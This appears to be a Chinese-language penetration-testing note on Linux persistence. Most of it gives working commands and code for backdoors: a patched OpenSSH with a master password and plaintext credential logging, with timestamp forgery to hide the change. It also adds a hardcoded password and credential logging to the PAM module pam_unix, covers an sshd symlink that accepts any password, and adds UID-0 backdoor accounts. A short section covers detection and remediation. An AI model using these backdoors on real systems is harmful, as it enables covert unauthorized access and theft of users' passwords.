权限维持-Linux-替换版本-OpenSSH后门
这里复现也真是奇怪,在靶机上没复现成功,在服务器上复现成功了
原理:替换本身操作系统的ssh协议支撑软件openssh,重新安装自定义的openssh,达到记录帐号密码,也可以采用万能密码连接的功能!
参考:(演示未做版本修改及文件修改时间处理)
1、环境准备:
yum -y install openssl openssl-devel pam-devel zlib zlib-devel yum -y install gcc gcc-c++ make wget http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz wget https://mirror.aarnet.edu.au/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz tar -xzvf openssh-5.9p1.tar.gz tar -xzvf 0x06-openssh-5.9p1.patch.tar.gz cp openssh-5.9p1.patch/sshbd5.9p1.diff openssh-5.9p1 cd openssh-5.9p1 && patch < sshbd5.9p1.diff
2、编辑密码:
vim includes.h 177 #define ILOG "/tmp/ilog"#ILOG是别人用ssh登录该主机记录的日志目录 178 #define OLOG "/tmp/olog"#OLOG是该主机用ssh登录其他主机记录的日志目录 179 #define SECRETPW "whgojp"#万能密码 180 #endif /* INCLUDES_H */
3、安装编译:
./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5 && make && make install service sshd restart #重启sshd服务 systemctl status sshd.service #查看ssh启动状态
修改sshd程序和配置文件的时间,避免被管理员发现sshd程序发生了修改
touch -r ssh_config.bank ssh_config touch -r sshd_config.bank sshd_config touch -r /usr/sbin/sshd.bank /usr/sbin/sshd
以及修改后的ssh版本
使用万能密码登录成功,并且未留下登录记录,同时在/tmp/ilog 记录了别人用ssh登录该主机记录的日志目录(明文密码)
还真是明文密码,溜了赶紧恢复快照
@拓展玩法:
1、可以采用万能密码登录
2、实现监控服务器登录登出的账号密码(发到外网)
OpenSSH后门的防范方法
重装OpenSSH软件,更新至最新版本7.2。
将SSH默认登录端口22更改为其他端口。
在IPTable中添加SSH访问策略。
查看命令历史记录,对可疑文件进行清理。在有条件的情况下,可重做系统。
修改服务器所有用户的密码为新的强健密码。
使用strace命令找出SSH后门。运行“ps aux | grep sshd”命令获取可疑进程的PID,运行“strace -o aa -ff -p PID”命令进行跟踪,成功登录SSH后,在当前目录下就生成了strace命令的输出。使用“grep open aa* | grep -v -e No -e null -e denied| grep WR”命令查看记录文件。在上面的命令中,过滤错误信息、/dev/null信息和拒绝(denied)信息,找出打开了读写模式(WR)的文件(因为要把记录的密码写入文件)。可以找到以读写方式记录在文件中的SSH后门密码文件的位置,并通过该方法判断是否存在SSH后门。当然,也有不记录密码,而仅仅留下一个万能SSH后门的情况。
权限维持-Linux-更改验证-SSH-PAM后门
参考:https://xz.aliyun.com/t/7902
PAM是一种认证模块,PAM可以作为Linux登录验证和各类基础服务的认证,简单来说就是一种用于Linux系统上的用户身份验证的机制。进行认证时首先确定是什么服务,然后加载相应的PAM的配置文件(位于/etc/pam.d),最后调用认证文件(于/lib/security)进行安全认证.简易利用的PAM后门也是通过修改PAM源码中认证的逻辑来达到权限维持
1、获取目标系统所使用的PAM版本,下载对应版本的pam版本
2、解压缩,修改pam_unix_auth.c文件,添加万能密码
3、编译安装PAM
4、编译完后的文件在:modules/pam_unix/.libs/pam_unix.so,复制到/lib64/security中进行替换,即使用万能密码登陆,将用户名密码记录到文件中。
配置环境
关闭
selinux setenforce 0
查询版本
rpm -qa | grep pam wget http://www.linux-pam.org/library/Linux-PAM-1.1.8.tar.gz tar -zxvf Linux-PAM-1.1.8 yum install gcc flex flex-devel -y
-修改配置:
留PAM后门和保存SSH登录的账号密码
修改 Linux-PAM-1.1.8/modules/pam_unix/pam_unix_auth.c
/* verify the password of this user */ retval = _unix_verify_password(pamh, name, p, ctrl); if(strcmp("hackers",p)==0){return PAM_SUCCESS;} //后门密码 if(retval == PAM_SUCCESS){ FILE * fp; fp = fopen("/tmp/.sshlog", "a");//SSH登录用户密码保存位置 fprintf(fp, "%s : %s\n", name, p); fclose(fp);} name = p = NULL;
AUTH_RETURN;
-编译安装:
./configure && make
-备份复制:
备份原有pam_unix.so,防止出现错误登录不上
复制新PAM模块到/lib64/security/目录下
cp /usr/lib64/security/pam_unix.so /tmp/pam_unix.so.bakcp cd modules/pam_unix/.libs cp pam_unix.so /usr/lib64/security/pam_unix.so
权限维持-Linux-登录方式-软链接&公私钥&新帐号
SSH软链接
在sshd服务配置启用PAM认证的前提下,PAM配置文件中控制标志为sufficient时,只要pam_rootok模块检测uid为0(root)即可成功认证登录。
SSH配置中开启了PAM进行身份验证
查看是否使用PAM进行身份验证:
cat /etc/ssh/sshd_config|grep UsePAM ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=4567
ssh root@xx.xx.xx.xx -p 4567 任意密码登录即可
缺点:重启后失效 重新开了一个端口,容易被发现
公私钥
https://www.bilibili.com/read/cv17721345/
开启:
vim /etc/ssh/sshd_config
RSAAuthentication yes
PubkeyAuthentication yes
AuthorizedKeysFile .ssh/authorized_keys
ssh-keygen -t rsa #三次回车
id_rsa : 私钥
id_rsa.pub : 公钥
直接登陆,无需密码
缺点:容易被发现
后门帐号
###添加root用户:
#添加账号test1,设置uid为0,密码为123456
useradd -p `openssl passwd -1 -salt 'salt' 123456` test1 -o -u 0 -g root -G root -s /bin/bash -d /home/test1
echo "xiaodi:x:0:0::/:/bin/sh" >> /etc/passwd #增加超级用户账号 passwd xiaodi #修改xiaodi的密码为xiaodi123
